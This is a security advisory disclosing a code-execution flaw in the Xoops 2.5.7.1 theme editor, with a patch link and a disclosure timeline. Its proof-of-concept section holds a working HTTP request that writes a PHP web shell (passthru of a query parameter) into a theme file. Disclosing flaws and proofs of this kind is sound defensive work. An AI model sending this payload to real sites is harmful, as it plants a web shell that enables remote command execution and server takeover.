Xoops 2.5.7.1: Code Execution
Date: 2016-01-28 09:44:261. Introduction
| Affected Product: | Xoops 2.5.7.1 |
| Fixed in: | Patch |
| Patch Link: | http://xoops.org/modules/news/article.php?storyid=6747 |
| Vendor Website: | http://xoops.org/ |
| Vulnerability Type: | Code Execution |
| Remote Exploitable: | Yes |
| Reported to vendor: | 11/21/2015 |
| Disclosed to public: | 01/28/2016 |
| Release mode: | Coordinated Release |
| CVE: | requested, but not assigned |
| Credits | Tim Coen of curesec GmbH |
2. Overview
Xoops is a content management system written in PHP. In version 2.5.7.1, it is vulnerable to code execution.
The theme editor allows the editing of CSS and HTML files. However, an authenticated attacker can edit the request to create new PHP files, leading to code execution.
An admin account is required for successful exploitation, but the request does not have CSRF protection, making CSRF an additional attack vector for this issue.
3. Proof of Concept
POST /xoops-2.5.7.1/htdocs/modules/system/admin.php?fct=tplsets&op=tpls_save HTTP/1.1 templates=<?php passthru($_GET['x']);&path_file=%2Fvar%2Fwww%2Fxoops-2.5.7.1%2Fhtdocs%2Fthemes%2Fdefault%2Fstyle.php&file=style.php&ext=php
4. Solution
To mitigate this issue please apply the security patch:
http://xoops.org/modules/news/article.php?storyid=6747
Please note that a newer version might already be available.
5. Report Timeline
| 11/21/2015 | Informed Vendor about Issue (no reply) |
| 12/10/2015 | CVE requested, but not assigned |
| 12/10/2015 | Reminded Vendor of Disclosure Date |
| 12/11/2015 | Vendor requests more time |
| 01/02/2016 | Vendor releases patch |
| 01/28/2016 | Disclosed to public |